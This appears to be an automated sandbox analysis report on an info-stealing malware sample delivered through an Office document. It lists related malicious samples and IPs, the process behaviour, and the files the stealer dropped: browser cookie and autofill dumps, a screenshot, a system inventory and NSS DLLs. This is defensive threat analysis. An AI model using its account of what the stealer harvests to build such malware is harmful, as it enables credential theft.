                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 29.2% (good quality ratio 27.9%)
                        • Quality average: 78.8%
                        • Quality standard deviation: 27.8%
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .docx
                        • Found Word or Excel or PowerPoint or XPS Viewer
                        • Attach to Office via COM
                        • Active ActiveX Object
                        • Scroll down
                        • Close Viewer
                        Warnings:
                        Show All
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • TCP Packets have been reduced to 100
                        • Report size getting too big, too many NtOpenFile calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                        • Report size getting too big, too many NtQueryDirectoryFile calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        21:33:54API Interceptor86x Sleep call for process: EQNEDT32.EXE modified
                        21:33:55API Interceptor911x Sleep call for process: toqqx.exe modified
                        21:35:04API Interceptor2x Sleep call for process: taskkill.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        198.98.60.43joncGi9hvx.exeGet hashmaliciousBrowse
                        • 198.98.60.43/

                        Domains

                        No context

                        ASN

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        PLUSSERVER-ASN1DEmzJ8O3L58V.exeGet hashmaliciousBrowse
                        • 31.210.20.238
                        vwr 30.04.2021.pdf.exeGet hashmaliciousBrowse
                        • 31.210.21.236
                        VWR CI 290421.xlsx.exeGet hashmaliciousBrowse
                        • 31.210.21.236
                        it54qPllN4.exeGet hashmaliciousBrowse
                        • 31.210.21.71
                        FPI_874101020075.xlsxGet hashmaliciousBrowse
                        • 31.210.21.71
                        mzJ8O3L58V.exeGet hashmaliciousBrowse
                        • 31.210.20.238
                        RFQ 00234567828723635387632988822.jarGet hashmaliciousBrowse
                        • 31.210.21.99
                        ORDER I_5130_745_618.xlsxGet hashmaliciousBrowse
                        • 31.210.21.231
                        RFQ 00234567828723635387632988822.jarGet hashmaliciousBrowse
                        • 31.210.21.99
                        6381ca8d_by_Libranalysis.xlsxGet hashmaliciousBrowse
                        • 31.210.20.238
                        Annexure A-61322.jarGet hashmaliciousBrowse
                        • 31.210.21.99
                        PLI5130745618.exeGet hashmaliciousBrowse
                        • 31.210.21.231
                        EPC Works for AMAALA AIRFIELD PROJECT - WORK .jarGet hashmaliciousBrowse
                        • 31.210.21.99
                        ShippingDocuments.exeGet hashmaliciousBrowse
                        • 31.210.21.236
                        purchase order confirmation.exeGet hashmaliciousBrowse
                        • 31.210.21.181
                        purchase order acknowledgement.exeGet hashmaliciousBrowse
                        • 31.210.21.181
                        TBBurmah Trading Co., Ltd - products inquiry .exeGet hashmaliciousBrowse
                        • 31.210.21.181
                        RFQ #ER428-BD.exeGet hashmaliciousBrowse
                        • 31.210.21.203
                        PaymentAdvice.exeGet hashmaliciousBrowse
                        • 31.210.20.71
                        f07c3008_by_Libranalysis.exeGet hashmaliciousBrowse
                        • 31.210.20.121
                        PONYNETUSjoncGi9hvx.exeGet hashmaliciousBrowse
                        • 198.98.60.43
                        Tpxgwea.exeGet hashmaliciousBrowse
                        • 209.141.50.70
                        2bb0000.exeGet hashmaliciousBrowse
                        • 104.244.73.85
                        2f50000.exeGet hashmaliciousBrowse
                        • 198.98.60.90
                        PL_5013_68_771.exeGet hashmaliciousBrowse
                        • 209.141.50.70
                        IMG602741105.exeGet hashmaliciousBrowse
                        • 198.98.49.140
                        SecuriteInfo.com.Trojan.GenericKD.46212578.16723.exeGet hashmaliciousBrowse
                        • 205.185.120.57
                        SecuriteInfo.com.Variant.Bulz.458140.4666.exeGet hashmaliciousBrowse
                        • 209.141.50.70
                        015f45de_by_Libranalysis.exeGet hashmaliciousBrowse
                        • 205.185.120.57
                        1a03e1c8_by_Libranalysis.xlsxGet hashmaliciousBrowse
                        • 205.185.120.57
                        Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                        • 209.141.50.70
                        SN-346.exeGet hashmaliciousBrowse
                        • 209.141.50.70
                        e3LQ8EXOy3.exeGet hashmaliciousBrowse
                        • 198.98.55.103
                        OR44501.exeGet hashmaliciousBrowse
                        • 209.141.50.70
                        IMG_103_65_070501.xlsxGet hashmaliciousBrowse
                        • 209.141.50.70
                        7MxQ94CDYD.exeGet hashmaliciousBrowse
                        • 205.185.120.57
                        ROpgySHM6N.exeGet hashmaliciousBrowse
                        • 198.98.55.103
                        IMG10365070501.exeGet hashmaliciousBrowse
                        • 209.141.50.70
                        PO_29_00412.exeGet hashmaliciousBrowse
                        • 198.251.84.92
                        IMG_8401_302_1076.docGet hashmaliciousBrowse
                        • 205.185.120.57

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        C:\ProgramData\freebl3.dlljoncGi9hvx.exeGet hashmaliciousBrowse
                          Proforma adjunta N#U00ba 42037,pdf.exeGet hashmaliciousBrowse
                            5.exeGet hashmaliciousBrowse
                              heUGqZXAJv.exeGet hashmaliciousBrowse
                                IMG602741105.exeGet hashmaliciousBrowse
                                  SecuriteInfo.com.Trojan.GenericKD.46212578.16723.exeGet hashmaliciousBrowse
                                    015f45de_by_Libranalysis.exeGet hashmaliciousBrowse
                                      e17486cd_by_Libranalysis.exeGet hashmaliciousBrowse
                                        1a03e1c8_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                          it54qPllN4.exeGet hashmaliciousBrowse
                                            FPI_874101020075.xlsxGet hashmaliciousBrowse
                                              6381ca8d_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                PLI5130745618.exeGet hashmaliciousBrowse
                                                  jX16Cu330u.exeGet hashmaliciousBrowse
                                                    5jHZqgYHCZ.exeGet hashmaliciousBrowse
                                                      dl6jAtWJeR.exeGet hashmaliciousBrowse
                                                        snNdil7Qjb.exeGet hashmaliciousBrowse
                                                          purchase order confirmation.exeGet hashmaliciousBrowse
                                                            purchase order acknowledgement.exeGet hashmaliciousBrowse
                                                              SecuriteInfo.com.Trojan.Inject4.11083.19609.exeGet hashmaliciousBrowse

                                                                Created / dropped Files

                                                                C:\ProgramData\826308279625120\temp
                                                                Process:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                Category:dropped
                                                                Size (bytes):28672
                                                                Entropy (8bit):0.9650411582864293
                                                                Encrypted:false
                                                                SSDEEP:48:T2loMLOpEO5J/KdGU1jX983Gul4kEBrvK5GYWgqRSESXh:inNww9t9wGAE
                                                                MD5:903C35B27A5774A639A90D5332EEF8E0
                                                                SHA1:5A8CE0B6C13D1AF00837AA6CA1AA39000D4EB7CF
                                                                SHA-256:1159B5AE357F89C56FA23C14378FF728251E6BDE6EEA979F528DB11C4030BE74
                                                                SHA-512:076BD35B0D59FFA7A52588332A862814DDF049EE59E27542A2DA10E7A5340758B8C8ED2DEFE78C5B5A89EE54C19A89D49D2B86B49BF5542D76C1D4A378B40277
                                                                Malicious:false
                                                                Preview: SQLite format 3......@ ..........................................................................C..........g...N......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                C:\ProgramData\843743064682002\_8437430646.zip
                                                                Process:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                File Type:Zip archive data, at least v2.0 to extract
                                                                Category:dropped
                                                                Size (bytes):89523
                                                                Entropy (8bit):7.993216390822432
                                                                Encrypted:true
                                                                SSDEEP:1536:Xjj2jvSN0EZaXwBrmeQadk9yw7W/bGxHRc252ZfS4EqRubwzg52:X32jvyMgBrmFL9Z7W/QRc9ZBEq8kzk2
                                                                MD5:CCE01036DA6BD61C2A24F57DB56FBDB9
                                                                SHA1:64E77351399FF115A78941FE736CB446B50FAFF6
                                                                SHA-256:361C355FE280B3E7496029625B34774A7E4F6AA254483A489E7472B713560EFA
                                                                SHA-512:DB14FFCA46F77B64D94222A69A6F0C6A9F888D77863DC6DB3DAC83322268816AD0A20F89DC310C6A1F796FF4B1B5F4BC1E111647E691F2AD6235CC37A607538E
                                                                Malicious:false
                                                                Preview: PK........V$.R............"...autofill/Google Chrome_Default.txtUT...s .`s .`s .`..PK........V$.R............"...autofill/Google Chrome_Default.txtUT...s .`s .`s .`PK........V$.R................cc/Google Chrome_Default.txtUT...s .`s .`s .`..PK........V$.R................cc/Google Chrome_Default.txtUT...s .`s .`s .`PK........T$.R........_...!...cookies/Google Chrome_Default.txtUT...r .`r .`r .`..n.P.E.D.`..c\..3<.L66.&...n..p..}h'-......T..s.[uW..9U.*k..a.T.5.......x...q.p_.qO@.R$....<?.. ?..2.U>..>O..S...P.CH.D..D.aI....`.p3...D.M!.....-.7.:fxj#.RI .LT..<L.A.9...Z.....M\.Q.Z.P..k.o.|. E.$..[.nc.T.....M.0u|...../.....g.........~9rlO..D. / v..q.....a d8..}.yi...-..T....-P..B..l........w.R...w...#....../....X..;)........:.N1.J..X.\{..s...Vq.....U...8Sg.Lt...N70:y......$.&,.'9..H........N.}....w.8 .1....;..l.L.<.g.o.f..p.v."....PK........T$.R.L......_...!...cookies/Google Chrome_Default.txtUT...r .`r .`r .`PK........V$.R............,...cookies/Mozilla Firefox_7xwg
                                                                C:\ProgramData\843743064682002\cookies\Google Chrome_Default.txt
                                                                Process:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):863
                                                                Entropy (8bit):5.8911119058626085
                                                                Encrypted:false
                                                                SSDEEP:12:c7QyiORop+BKX7ky3Zvhz2AfopYKX7ky3Zvhz2Af7e9fG796RopYx7JbMQYFiVTl:PyiOdK4u5BNPK4u5BNSfe6nAQYMb
                                                                MD5:D7778B3A3B8250AA23886E063110E242
                                                                SHA1:8B1FF81515E8D34FBC06647FF14B62D8D3EFF7F7
                                                                SHA-256:91749AF611BAB1C703B58EF9B1750BC9CC9BB4713E9BEE36699D53A5B52AABB0
                                                                SHA-512:FCA16FE274660B9905D01D11AD558FD88DF42AABCF6627F6806E40EFF035347A916D2C15CF0EE68F4C11BFCFC716B9C88C52A5C6748B9A6EBD7E5F13EDEC70B0
                                                                Malicious:false
                                                                Preview: .google.com.TRUE./.FALSE.1598113977.1P_JAR.2020-07-23-11...google.com.FALSE./complete/search.TRUE.1611073977.CGIC.Inx0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44LGFwcGxpY2F0aW9uL3NpZ25lZC1leGNoYW5nZTt2PWIzO3E9MC45...google.com.FALSE./search.TRUE.1611073977.CGIC.Inx0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44LGFwcGxpY2F0aW9uL3NpZ25lZC1leGNoYW5nZTt2PWIzO3E9MC45...google.com.TRUE./.TRUE.2145934777.CONSENT.WP.289365..www.google.com.TRUE./.TRUE.1595522578.DV.o_pckDND3uUhECjFbPp1FKC33S-3N5fyqnMyKQBBhwQAAAA...google.com.FALSE./.FALSE.1611333176.NID.204=zHZHsWNaflUVFfsxG56MgZOfytEp8XFAlV7pi0zya56RyNFGZcPCMZVlpHtIAy0i1Ox4aa97QIJG3gSHNd61imTOaHBXhzZCIae-V3qMl-EUWfqGnfJqmxAvNz0nyjeqaAt3L5JojSp4QH8QX6oExJDweiMVpCoR3XXyGaHutYI..
                                                                C:\ProgramData\843743064682002\cookies\Mozilla Firefox_7xwghk55.default.txt
                                                                Process:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1428
                                                                Entropy (8bit):5.149063913656308
                                                                Encrypted:false
                                                                SSDEEP:24:JUWmMFS+PSlqc8aeP4qH2GPfQQttE6sC63tpsC63tGz1nMG:+dlqc8aPQ2QB1B6nB6UmG
                                                                MD5:1CC1A2AA61983723337368F30E206D3A
                                                                SHA1:90451FAA80DD20736D4CEE3236967D86F952EA09
                                                                SHA-256:47A3DD7534EC80C721BBE6614A6C4C573867BD17383BB80145B8E57244639964
                                                                SHA-512:E859A23F01D1E602278E85B4AC4B8743A34E3DB311C261AAD2A099D4A871AAB93610DA51177D3F0F97F3C966D5874CC225C85799B81242A6ADF619B0DC950408
                                                                Malicious:false
                                                                Preview: www.mozilla.org.TRUE./.TRUE.1510052761.moz-notification-fx-out-of-date.fx-out-of-date-banner...mozilla.org.TRUE./.TRUE.1823598364.optimizelyEndUserId.oeu1508238364462r0.17947700943881573...mozilla.org.TRUE./.TRUE.1823598364.optimizelySegments.%7B%22245617832%22%3A%22none%22%2C%22245677587%22%3A%22ff%22%2C%22245875585%22%3A%22direct%22%2C%22246048108%22%3A%22false%22%7D...246059135.log.optimizely.com.TRUE./.TRUE.1823598366.end_user_id.oeu1508238364462r0.17947700943881573...mozilla.org.TRUE./.TRUE.1823598366.optimizelyBuckets.%7B%7D...mozilla.org.TRUE./.TRUE.1508238381.optimizelyPendingLogEvents.%5B%22n%3Doptly_activate%26u%3Doeu1508238364462r0.17947700943881573%26wxhr%3Dtrue%26time%3D1508238364.494%26f%3D8540095929%2C8784714594%26g%3D%22%2C%22n%3Dhttps%253A%252F%252Fwww.mozilla.org%252Fen-US%252Ffirefox%252F52.0.1%252Ffirstrun%252F%253Ff%253D102%26u%3Doeu1508238364462r0.17947700943881573%26wxhr%3Dtrue%26time%3D1508238364.446%26f%3D8540095929%2C8784714594%26g%3D859230343%22%2C%22n%3Dhttp
                                                                C:\ProgramData\843743064682002\screenshot.jpg
                                                                Process:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                Category:dropped
                                                                Size (bytes):94278
                                                                Entropy (8bit):7.8930427281627615
                                                                Encrypted:false
                                                                SSDEEP:1536:uSYOkwQmfLMy7Okl3F1/TE8lsaCs12femTpqCc/jYO2pMNPDhMCvS:ZP9BDj1/T3qaZ0fe8nc89SPBS
                                                                MD5:6B7120F418DC6BFB1E3203B90B0D5FDB
                                                                SHA1:1A61B1E796CF8C29638FCD7BDFE4E00CC4A47A73
                                                                SHA-256:6F5F9DEA007A47B583A7EB4B9394C18F39C92BF2DFD90A2E7EE6A238C6CBD7B0
                                                                SHA-512:CC1B6ECF00D2A81FF0628D974670633B8158C69DD75D132C04AD3FBA1B8ACAD585A698498DE6544306B7F34F02A08D5A58D2C122987CE1172C59E70535ED793E
                                                                Malicious:false
                                                                Preview: ......JFIF.....`.`.....C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......+......,.F..;..}r=.>...O....=F$...<Lc'..$m.2k..z+.......An=|._.Y.....g...*..%..C./.L.(.....qh..J......7a..+...U.Utg88;1(...3....e.c../.*..^..5..SI.2.. .Msb..^...{...&....1E{....3.mq..y.._nA.7...n.e.Bg.E.....W.O;...M....#.Y|..G.Q^....Hx%{;...U$...q....5.aq..).>.-j..nn.QKEu...R..b..W.x...~..Iw}.....qQ..x../..x...ev._.v..s9.Ev.....<..?.Bt.........T.....
                                                                C:\ProgramData\843743064682002\system.txt
                                                                Process:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):2100
                                                                Entropy (8bit):5.154704409151816
                                                                Encrypted:false
                                                                SSDEEP:48:7+58+6FIcVjWUJuPr0PFpIPUFuPBTyAG3P6tPvph+PWp2PU0PpiuPpeuPa1nPrYn:7+58dNl1Juz0NpI8FuZ+3St3p4ep280B
                                                                MD5:FFD75CD605399308AF82482A9AE51AF0
                                                                SHA1:4EA25EEAFE29842A3599BFDC6751D8C666E15DA4
                                                                SHA-256:530801A52610B6C42FA69A815F5BC3C9E2EF6B2FBBCBDAFE50E5B3871F1215A6
                                                                SHA-512:F81038C2380D4473872A6AB24881FC56088DD59A38EF703BCA96F8F344347D9AD80A3F0EF2D67D42A42B84A481B2E1F42E69A8E9B9FE60E33687CEBFBE783A8D
                                                                Malicious:false
                                                                Preview: System ---------------------------------------------------..Windows: Windows 7 Professional..Bit: x64..User: user..Computer Name: 035347..System Language: en-US..Machine ID: ea860e7a-a87f-4a88-92ef-38f744458171..GUID: {846ee340-7039-11de-9d20-806e6f6e6963}..Domain Name: Unknown..Workgroup: MXPXCVP..Keyboard Languages: English (United States)....Hardware -------------------------------------------------..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..Logical processors: 4..Videocard: Standard VGA Graphics Adapter..Display: 1280x1024..RAM: 8191 MB..Laptop: No....Time -----------------------------------------------------..Local: 4/5/2021 21:39:59..Zone: UTC-8....Network --------------------------------------------------..IP: IP?..Country: Country?....Installed Softwrare --------------------------------------..Adobe Flash Player 25 ActiveX 25.0.0.127..Adobe Flash Player 25 NPAPI 25.0.0.127..Google Chrome 84.0.4147.135..Mozilla Firefox 52.0.1 (x86 en-US) 52.0.1..Mozilla Maintenance Ser
                                                                C:\ProgramData\843743064682002\temp
                                                                Process:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                Category:dropped
                                                                Size (bytes):749568
                                                                Entropy (8bit):0.4173358068615721
                                                                Encrypted:false
                                                                SSDEEP:384:iPQHscflGwP8ldC0fa1Vump8ldC0fa1VumgUm7D:ioHscflGwEjfaAjfalm7
                                                                MD5:F8F1E2781634D77A5F5A572598B4BF40
                                                                SHA1:F64083052E1F94802F08607E55005A99618FE523
                                                                SHA-256:24EAE413DDF596D401FA0F48FBDCEB6AD0368D14D5D53A5A5763CFA68C46E598
                                                                SHA-512:A98AF9BA004082FE01E76542F57EDDC3525035D35E607D0BA3E4BA936213AB986487654FE920F2459B56B30EB61845567B35B9EB8F8FDE5FC2FE3919412B6654
                                                                Malicious:false
                                                                Preview: SQLite format 3......@ ..........................................................................C..........g...N......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                C:\ProgramData\freebl3.dll
                                                                Process:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):334288
                                                                Entropy (8bit):6.807000203861606
                                                                Encrypted:false
                                                                SSDEEP:6144:C8YBC2NpfYjGg7t5xb7WOBOLFwh8yGHrIrvqqDL6XPowD:CbG7F35BVh8yIZqn65D
                                                                MD5:EF2834AC4EE7D6724F255BEAF527E635
                                                                SHA1:5BE8C1E73A21B49F353C2ECFA4108E43A883CB7B
                                                                SHA-256:A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA
                                                                SHA-512:C6EA0E4347CBD7EF5E80AE8C0AFDCA20EA23AC2BDD963361DFAF562A9AED58DCBC43F89DD826692A064D76C3F4B3E92361AF7B79A6D16A75D9951591AE3544D2
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                • Filename: joncGi9hvx.exe, Detection: malicious, Browse
                                                                • Filename: Proforma adjunta N#U00ba 42037,pdf.exe, Detection: malicious, Browse
                                                                • Filename: 5.exe, Detection: malicious, Browse
                                                                • Filename: heUGqZXAJv.exe, Detection: malicious, Browse
                                                                • Filename: IMG602741105.exe, Detection: malicious, Browse
                                                                • Filename: SecuriteInfo.com.Trojan.GenericKD.46212578.16723.exe, Detection: malicious, Browse
                                                                • Filename: 015f45de_by_Libranalysis.exe, Detection: malicious, Browse
                                                                • Filename: e17486cd_by_Libranalysis.exe, Detection: malicious, Browse
                                                                • Filename: 1a03e1c8_by_Libranalysis.xlsx, Detection: malicious, Browse
                                                                • Filename: it54qPllN4.exe, Detection: malicious, Browse
                                                                • Filename: FPI_874101020075.xlsx, Detection: malicious, Browse
                                                                • Filename: 6381ca8d_by_Libranalysis.xlsx, Detection: malicious, Browse
                                                                • Filename: PLI5130745618.exe, Detection: malicious, Browse
                                                                • Filename: jX16Cu330u.exe, Detection: malicious, Browse
                                                                • Filename: 5jHZqgYHCZ.exe, Detection: malicious, Browse
                                                                • Filename: dl6jAtWJeR.exe, Detection: malicious, Browse
                                                                • Filename: snNdil7Qjb.exe, Detection: malicious, Browse
                                                                • Filename: purchase order confirmation.exe, Detection: malicious, Browse
                                                                • Filename: purchase order acknowledgement.exe, Detection: malicious, Browse
                                                                • Filename: SecuriteInfo.com.Trojan.Inject4.11083.19609.exe, Detection: malicious, Browse
                                                                Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L....b.[.........."!.........f......)........................................p.......s....@.........................p...P............@..x....................P......0...T...............................@...............8............................text...t........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................
                                                                C:\ProgramData\mozglue.dll
                                                                Process:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):137168
                                                                Entropy (8bit):6.78390291752429
                                                                Encrypted:false
                                                                SSDEEP:3072:7Gyzk/x2Wp53pUzPoNpj/kVghp1qt/dXDyp4D2JJJvPhrSeTuk:6yQ2Wp53iO/kVghp12/dXDyyD2JJJvPR
                                                                MD5:8F73C08A9660691143661BF7332C3C27
                                                                SHA1:37FA65DD737C50FDA710FDBDE89E51374D0C204A
                                                                SHA-256:3FE6B1C54B8CF28F571E0C5D6636B4069A8AB00B4F11DD842CFEC00691D0C9CD
                                                                SHA-512:0042ECF9B3571BB5EBA2DE893E8B2371DF18F7C5A589F52EE66E4BFBAA15A5B8B7CC6A155792AAA8988528C27196896D5E82E1751C998BACEA0D92395F66AD89
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L...._.[.........."!.....z...................................................@.......3....@A........................@...t.......,.... ..x....................0..h.......T...................T.......h...@...................l........................text....x.......z.................. ..`.rdata..^e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..h....0......................@..B........................................................................................................................................................................................................................................
                                                                C:\ProgramData\msvcp140.dll
                                                                Process:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):440120
                                                                Entropy (8bit):6.652844702578311
                                                                Encrypted:false
                                                                SSDEEP:12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
                                                                MD5:109F0F02FD37C84BFC7508D4227D7ED5
                                                                SHA1:EF7420141BB15AC334D3964082361A460BFDB975
                                                                SHA-256:334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
                                                                SHA-512:46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................
                                                                C:\ProgramData\nss3.dll
                                                                Process:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1246160
                                                                Entropy (8bit):6.765536416094505
                                                                Encrypted:false
                                                                SSDEEP:24576:Sb5zzlswYNYLVJAwfpeYQ1Dw/fEE8DhSJVIVfRyAkgO6S/V/jbHpls4MSRSMxkoo:4zW5ygDwnEZIYkjgWjblMSRSMqH
                                                                MD5:BFAC4E3C5908856BA17D41EDCD455A51
                                                                SHA1:8EEC7E888767AA9E4CCA8FF246EB2AACB9170428
                                                                SHA-256:E2935B5B28550D47DC971F456D6961F20D1633B4892998750140E0EAA9AE9D78
                                                                SHA-512:2565BAB776C4D732FFB1F9B415992A4C65B81BCD644A9A1DF1333A269E322925FC1DF4F76913463296EFD7C88EF194C3056DE2F1CA1357D7B5FE5FF0DA877A66
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.4.g.Z.g.Z.g.Z.n...s.Z..[.e.Z..B..c.Z..Y.j.Z.._.m.Z..^.l.Z.E.[.o.Z..[.d.Z.g.[..Z..^.m.Z..Z.f.Z....f.Z..X.f.Z.Richg.Z.................PE..L....b.[.........."!................w........................................@............@..................................=..T.......p........................}..p...T..............................@............................................text............................... ..`.rdata...R.......T..................@..@.data...tG...`..."...B..............@....rsrc...p............d..............@..@.reloc...}.......~...h..............@..B........................................................................................................................................................................................................................................................................................
                                                                C:\ProgramData\softokn3.dll
                                                                Process:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):144848
                                                                Entropy (8bit):6.539750563864442
                                                                Encrypted:false
                                                                SSDEEP:3072:UAf6suip+d7FEk/oJz69sFaXeu9CoT2nIVFetBWsqeFwdMIo:p6PbsF4CoT2OeU4SMB
                                                                MD5:A2EE53DE9167BF0D6C019303B7CA84E5
                                                                SHA1:2A3C737FA1157E8483815E98B666408A18C0DB42
                                                                SHA-256:43536ADEF2DDCC811C28D35FA6CE3031029A2424AD393989DB36169FF2995083
                                                                SHA-512:45B56432244F86321FA88FBCCA6A0D2A2F7F4E0648C1D7D7B1866ADC9DAA5EDDD9F6BB73662149F279C9AB60930DAD1113C8337CB5E6EC9EED5048322F65F7D8
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....b.[.........."!.........b...............................................P............@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................
                                                                C:\ProgramData\sqlite3.dll
                                                                Process:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):645592
                                                                Entropy (8bit):6.50414583238337
                                                                Encrypted:false
                                                                SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                • Antivirus: ReversingLabs, Detection: 0%
